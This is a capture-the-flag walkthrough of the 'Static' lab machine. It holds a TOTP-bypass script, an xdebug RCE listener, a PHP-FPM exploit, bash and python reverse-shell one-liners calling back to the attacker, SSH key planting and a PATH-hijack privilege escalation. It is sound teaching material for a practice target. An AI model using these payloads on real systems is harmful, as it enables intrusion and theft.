Static

Enumeration

As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.246 -oN allPorts

-sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.
-p- scanning the entire port range, from 1 to 65535.
-T5 insane mode, it is the fastest mode of the nmap time template.
-Pn assume the host is online.
-n scan without reverse DNS resolution.
-oN save the scan result into a file, in this case the allports file.

# Nmap 7.92 scan initiated Mon Sep 19 23:24:24 2022 as: nmap -sS --min-rate 5000 -n -Pn -p- -oN secondScan 10.10.10.246
Nmap scan report for 10.10.10.246
Host is up (0.047s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE SERVICE
22/tcp   open  ssh
2222/tcp open  EtherNetIP-1
8080/tcp open  http-proxy

# Nmap done at Mon Sep 19 23:25:04 2022 -- 1 IP address (1 host up) scanned in 39.76 seconds

Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:

nmap -sC -sV -p22,2222,8080 10.10.10.246 -oN targeted

-sC performs the scan using the default set of scripts.
-sV enables version detection.
-oN save the scan result into file, in this case the targeted file.

# Nmap 7.92 scan initiated Mon Sep 19 23:25:26 2022 as: nmap -sCV -p22,2222,8080 -oN secondTargeted 10.10.10.246
Nmap scan report for 10.10.10.246
Host is up (0.036s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 16:bb:a0:a1:20:b7:82:4d:d2:9f:35:52:f4:2e:6c:90 (RSA)
|   256 ca:ad:63:8f:30:ee:66:b1:37:9d:c5:eb:4d:44:d9:2b (ECDSA)
|_  256 2d:43:bc:4e:b3:33:c9:82:4e:de:b6:5e:10:ca:a7:c5 (ED25519)
2222/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a9:a4:5c:e3:a9:05:54:b1:1c:ae:1b:b7:61:ac:76:d6 (RSA)
|   256 c9:58:53:93:b3:90:9e:a0:08:aa:48:be:5e:c4:0a:94 (ECDSA)
|_  256 c7:07:2b:07:43:4f:ab:c8:da:57:7f:ea:b5:50:21:bd (ED25519)
8080/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-robots.txt: 2 disallowed entries 
|_/vpn/ /.ftp_uploads/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Sep 19 23:25:55 2022 -- 1 IP address (1 host up) scanned in 29.35 seconds

The SSH services on ports 22, and 2222, look like are hosted in different systems. Could be different containers. Website on port 8080 shows an empty page. But nmap detected a robots.txt file with two entries.

The /.ftp_uploads/ directory has two files.

The warning.txt file says that some files might be corrupted.

The db.sql.gz file looks like a GZIP compressed file.

file db.sql.gz

db.sql.gz: gzip compressed data, was "db.sql", last modified: Thu Jun 18 15:43:42 2020, from Unix, original size modulo 2^32 355

But it looks like the file is corrupted.

gzip -d db.sql.gz

-d decompress file.

gzip: db.sql.gz: invalid compressed data--crc error

gzip: db.sql.gz: invalid compressed data--length erro

Exploitation

There is a tool called fixgz, which you can download from here, which allow us to fix a corrupted .gz file.

git clone https://github.com/yonjar/fixgz
cd fixgz/
gcc fixgz.cpp -o fixgz

Let's fix the corrupted file.

fixgz db.sql.gz db.sql.gz.fixed

Now, we could read its content with zcat.

zcat db.sql.gz.fixed

CREATE DATABASE static;
USE static;
CREATE TABLE users ( id smallint unsigned not null auto_increment, username varchar(20) not null, password varchar(40) not null, totp varchar(16) not null, primary key (id) ); 
INSERT INTO users ( id, username, password, totp ) VALUES ( null, 'admin', 'd033e22ae348aeb5660fc2140aec35850c4da997', 'orxxi4c7orxwwzlo' );

We get the password hash of the admin user. The password for that SHA1 hash is admin, as we can see in crackstation. Note that we also see a TOTP key, which might be valuable later.

On the other hand, the /vpn/ directory shows a login page, and the credentials that we found seem to be valid.

But, it asks for an OTP number, because 2FA is enabled.

I wrote the following script, which will give the correct OTP number, synchronizing the time, and using the TOTP key.

#!/usr/bin/python3

import pyotp
import ntplib
from time import ctime

client = ntplib.NTPClient()
response = client.request("10.10.10.246")
totp = pyotp.TOTP("orxxi4c7orxwwzlo")
print(totp.at(response.tx_time))

Now, we are able to log in.

python getToken.py

The website shows a list of servers with their IP addresses and their status.

If we enter something on the Common Name field, and press on Generate, we'll download a .ovpn file.

The VPN file won't work because it is trying to connect to vpn.static.htb.

openvpn test.ovpn

...
2022-09-20 18:34:40 RESOLVE: Cannot resolve host address: vpn.static.htb:1194 (Name or service not known)
...

Let's add the domain name to the /etc/hosts file.

nano /etc/hosts

# Host addresses
127.0.0.1  localhost
127.0.1.1  alfa8sa
::1        localhost ip6-localhost ip6-loopback
ff02::1    ip6-allnodes
f02::2     ip6-allrouters
10.10.10.246    vpn.static.htb

Now, we can connect to the VPN.

openvpn test.ovpn

...
2022-09-20 18:37:37 Initialization Sequence Completed

Note that we have a new IP address on the interface tun9.

ip a

...
10: tun9: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500
    link/none 
    inet 172.30.0.9/16 scope global tun9
       valid_lft forever preferred_lft forever
    inet6 fe80::4d88:26ab:dbee:9517/64 scope link stable-privacy 
       valid_lft forever preferred_lft forever

Let's use the bnmap tool, which you can download from here, to check for open ports on the hosts that we saw on the website. First, put the IP addresses of the other servers in the hosts file.

nano hosts

172.17.0.10
172.20.0.10
172.20.0.11
172.30.0.1
192.168.254.3

Now, scan those IP addresses through the tun9 interface.

bnmap.sh -f hosts -i tun9

-f scan networks and/or hosts in file.
-i scan interface.

 _                   
| |__  _ __  _ __ ___   __ _ _ __  
| '_ \| '_ \| '_ \ _ \ / _\ | '_ \ 
| |_) | | | | | | | | | (_| | |_) |
|_.__/|_| |_|_| |_| |_|\__,_| .__/ 
                            |_|    
-------------@alfa8sa--------------

-----------------------------------
[*] Scanning open ports for 172.17.0.10

[#########################] 100% (10000 / 10000 ports)

-----------------------------------
[*] Scanning open ports for 172.20.0.10
        [!] Port open: 172.20.0.10:22
        [!] Port open: 172.20.0.10:80

[#########################] 100% (10000 / 10000 ports)

-----------------------------------
[*] Scanning open ports for 172.20.0.11
        [!] Port open: 172.20.0.11:3306

[#########################] 100% (10000 / 10000 ports)

-----------------------------------
[*] Scanning open ports for 172.30.0.1
        [!] Port open: 172.30.0.1:22
        [!] Port open: 172.30.0.1:2222

[#########################] 100% (10000 / 10000 ports)

-----------------------------------
[*] Scanning open ports for 192.168.254.3

[#########################] 100% (10000 / 10000 ports)

As we can see, we don't have connection with the pub and pki server, the db server has an SQL service exposed, the web server has both SSH and HTTP exposed, and the vpn server has the same services as the main machine. Let's take a look at the website in the web server. First, to reach the container, add an ip route.

ip route add 172.20.0.10 dev tun9

The vpn/ directory shows the same login page saw earlier. And the info.php file shows the default PHP info page.

At some point, you'll see that the xdebug functionality is enabled.

There is a way to get Remote Command Execution in the machine using xdebug.

#!/usr/bin/env python2

import socket, signal, sys, re
from base64 import b64decode

def def_handler(sig, frame):
    print("\n\n[!] Quiting...\n")
    sys.exit(1)

#Ctrl+C
signal.signal(signal.SIGINT, def_handler)

ip_port = ('0.0.0.0', 9000) 
sk = socket.socket()
sk.bind(ip_port) 
sk.listen(10) 
conn, addr = sk.accept() 

while True: 
    client_data = conn.recv(1024) 

    response_b64 = re.findall(r'CDATA\[(.*?)\]', client_data)[0]
    try:
        output = b64decode(response_b64)
        print(output)
    except:
        None

    data = raw_input ('>> ') 
    conn.sendall('eval -i 1 -- %s\x00' % data.encode('base64'))

Let's execute the script with Python 2.

python2 exploit_shell.py

To trigger the exploit we'll have to make a GET request.

curl 172.20.0.10/info.php?XDEBUG_SESSION_START=alfa8sa

Now, we are able to execute commands on the system.

>> system("whoami")
www-data

Let's get a reverse shell. First, set a netcat listener on port 4444.

nc -lvnp 4444

-l listen mode.
-v verbose mode.
-n numeric-only IP, no DNS resolution.
-p specify the port to listen on.

Now, send a reverse shell from the web server to our local machine, with the IP address of the VPN. We'll get the reverse shell as the www-data user, and we'll be able to grab the user flag.

system("bash -c 'bash -i >& /dev/tcp/172.30.0.9/4444 0>&1'")

listening on [any] 4444 ...
connect to [172.30.0.9] from (UNKNOWN) [172.30.0.1] 44844
bash: cannot set terminal process group (37): Inappropriate ioctl for device
bash: no job control in this shell
www-data@web:/var/www/html$ whoami
whoami
www-data
www-data@web:/var/www/html$ cat /home/user.txt
cat /home/user.txt
c3f343befcac5fa92fb5373456e94247

Privilege Escalation

To get a more comfortable shell, let's create a new pair of SSH keys on our local machine.

ssh-keygen

Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): 
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /root/.ssh/id_rsa
Your public key has been saved in /root/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:BB525izsjrcx4YURZ4Alw/RcnBBo+qu/GliJ9DGavw4 root@alfa8sa
The key's randomart image is:
+---[RSA 3072]----+
|   o++X=*.       |
|    =O %o        |
| . =  B +        |
|..=.o. =         |
|.ooo  + S        |
| o. .+ o         |
|.E....*          |
|  ..o. +         |
|  +*o..          |
+----[SHA256]-----+

Copy the public key.

cat id_rsa.pub | xclip -sel clip

And put it in the authorized_keys of the www-data user.

echo "ssh-rsa AAAA...Nx/7E= root@alfa8sa" >> /home/www-data/.ssh/authorized_keys

Now, we are able to log into the machine through SSH without having to give any password.

ssh www-data@10.10.10.246 -p 2222

Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.19.0-17-amd64 x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.
Last login: Mon Jun 14 08:00:30 2021 from 10.10.14.4
www-data@web:~$ whoami
www-data

If we check the network interfaces, we'll see that the web server has two interfaces, apart from the local one.

ifconfig

eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.20.0.10  netmask 255.255.255.0  broadcast 172.20.0.255
        ether 02:42:ac:14:00:0a  txqueuelen 0  (Ethernet)
        RX packets 10361  bytes 782008 (782.0 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 10371  bytes 744940 (744.9 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.254.2  netmask 255.255.255.0  broadcast 192.168.254.255
        ether 02:42:c0:a8:fe:02  txqueuelen 0  (Ethernet)
        RX packets 28  bytes 10641 (10.6 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 9  bytes 628 (628.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 20  bytes 1055 (1.0 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 20  bytes 1055 (1.0 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

And from this container we have connection with the pki server.

ping -c 1 192.168.254.3

-c number of ICMP packets.

PING 192.168.254.3 (192.168.254.3) 56(84) bytes of data.
64 bytes from 192.168.254.3: icmp_seq=1 ttl=64 time=0.209 ms

--- 192.168.254.3 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.209/0.209/0.209/0.000 ms

Let's transfer with scp the bnmap.sh script to the web server, to be able to scan the pki server.

scp -P 2222 bnmap.sh www-data@10.10.10.246:/tmp/bnmap.sh

Now, give the script the right permissions, and scan the pki server.

chmod +x bnmap.sh
./bnmap.sh -p 192.168.254.3

 _                   
| |__  _ __  _ __ ___   __ _ _ __  
| '_ \| '_ \| '_ \ _ \ / _\ | '_ \ 
| |_) | | | | | | | | | (_| | |_) |
|_.__/|_| |_|_| |_| |_|\__,_| .__/ 
                            |_|    
-------------@alfa8sa--------------


[*] Scanning open ports for 192.168.254.3
        [!] Port open: 192.168.254.3:80

[#########################] 100% (10000 / 10000 ports)

Only port 80 is open. Let's exit the current SSH shell, and log in again, but doing port forwarding of port 80 of the pki server.

ssh www-data@10.10.10.246 -p 2222 -L 80:192.168.254.3:80

Now, we can access the HTTP server of the pki server by accessing port 80 on our local machine.

There is not much going on the website. But if we check the HTTP headers, we'll see that the website is running PHP-FPM/7.1.

curl http://127.0.0.1/index.php -I

HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Tue, 20 Sep 2022 17:32:41 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP-FPM/7.1

There is a python script, which you can download from here, which exploits PHP-FPM, and allow us to execute commands on the system.

python exploit.py --url http://127.0.0.1/index.php --verbose

...
[*] RCE successfully exploited!

    You should be able to run commands using:
    curl http://127.0.0.1/index.php?a=bin/ls+/

Now, we are able to run commands on the system.

curl -s -G -X GET "http://127.0.0.1/index.php" --data-urlencode "a=/usr/bin/whoami" | awk "/' -/,/: cannot open/" | sed "s/' -//g" | grep -v cannot

www-data

Time to get a shell. As we can only catch the reverse shell from the web server, we'll have to transfer the nc binary, which you can download from here, to the web server.

scp -P 2222 ncat www-data@10.10.10.246:/tmp/ncat

Now, set a netcat listener on port 4444.

/tmp/ncat -lvnp 4444

I will run a one-liner reverse shell in python. Then, we'll catch a reverse shell from the pki server.

curl -s -G -X GET "http://127.0.0.1/index.php" --data-urlencode "a=/usr/bin/python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.254.2",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Ncat: Version 6.49BETA1 ( http://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 192.168.254.3.
Ncat: Connection from 192.168.254.3:54528.
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ hostname -I
192.168.254.3 
$ hostname
pki

Let's set an interactive TTY shell.

script /dev/null -c /bin/bash

Then I press Ctrl+Z and execute the following command on my local machine:

stty raw -echo; fg
reset
Terminal type? xterm

Next, I export a few variables:

export TERM=xterm
export SHELL=bash

Finally, I run the following command in our local machine:

stty size

51 236

And set the proper dimensions in the victim machine:

stty rows 51 columns 236

At this point, I started enumerating the machine looking for ways of becoming the root user, but I couldn't find anything until I listed the capabilities.

Linux divides the privileges traditionally associated with superuser into distinct units, known as capabilities, which can be independently enabled and disabled.

getcap / -r 2>/dev/null

-r enables recursive search.

/usr/bin/ersatool = cap_setuid+eip

There is one binary with the cap_setuid capability. Let's transfer pspy to the pki server, and execute the binary to see what it is doing. First, transfer it to the web server.

scp -P 2222 pspy64 www-data@10.10.10.246:/tmp/pspy

Now, log in again into the web server, and set a simple HTTP server on port 1234 with python in the /tmp directory.

ssh www-data@10.10.10.246 -p 2222
cd /tmp
python3 -m http.server 1234

As the pki machine doesn't have tools such as wget or curl to download pspy from the web server, we'll have to make our own curl function. Copy the following function, and paste it in the terminal.

function __curl() {
  read proto server path <<<$(echo ${1//// })
  DOC=/${path// //}
  HOST=${server//:*}
  PORT=${server//*:}
  [[ x"${HOST}" == x"${PORT}" ]] && PORT=80

  exec 3<>/dev/tcp/${HOST}/$PORT
  echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3
  (while read line; do
   [[ "$line" == $'\r' ]] && break
  done && cat) <&3
  exec 3>&-
}

Now, download pspy from the web server using the custom curl function.

__curl http://192.168.254.2:1234/pspy > pspy
chmod +x pspy

Now, if we run pspy, and then on another shell we run the ersatool binary.

ersatool

help
create|print|revoke|exit
# create
create->CN=testing
client
dev tun9
proto udp
remote vpn.static.htb 1194
...

The tool looks like it's creating the VPN file we used at the begging of the machine. But, we can see with pspy, that the binary runs with the UID=0, which means that runs as root, and it is using relative paths with some commands.

2022/09/20 18:05:16 CMD: UID=0    PID=2045   | openssl version

We could exploit a path hijacking vulnerability to set the SUID permission to the /bin/bash binary. First, make a file called openssl in the /tmp directory with the following content, and give it execution permissions.

echo "chmod u+s /bin/bash" > /tmp/openssl
chmod +x /tmp/openssl

Now, modify the $PATH variable, so that the /tmp directory is the first one.

export PATH=/tmp:$PATH

Now, run the ersatool binary, and enter some random CN.

ersatool

# test
create|print|revoke|exit
# create
create->CN=testing
...

Now, as the /tmp directory is the first one in the $PATH variable, the binary has executed the openssl script we made as root.

2022/09/20 18:14:28 CMD: UID=0    PID=2077   | chmod u+s /bin/bash

Finally, if we execute bash as root, all we have to do is reap the harvest and take the root flag.

bash -p

bash-4.4# whoami
root
bash-4.4# cat /root/root.txt 
b3298f99ac5999202090829ed5fa9fb6

Last updated 2 years ago

Was this helpful?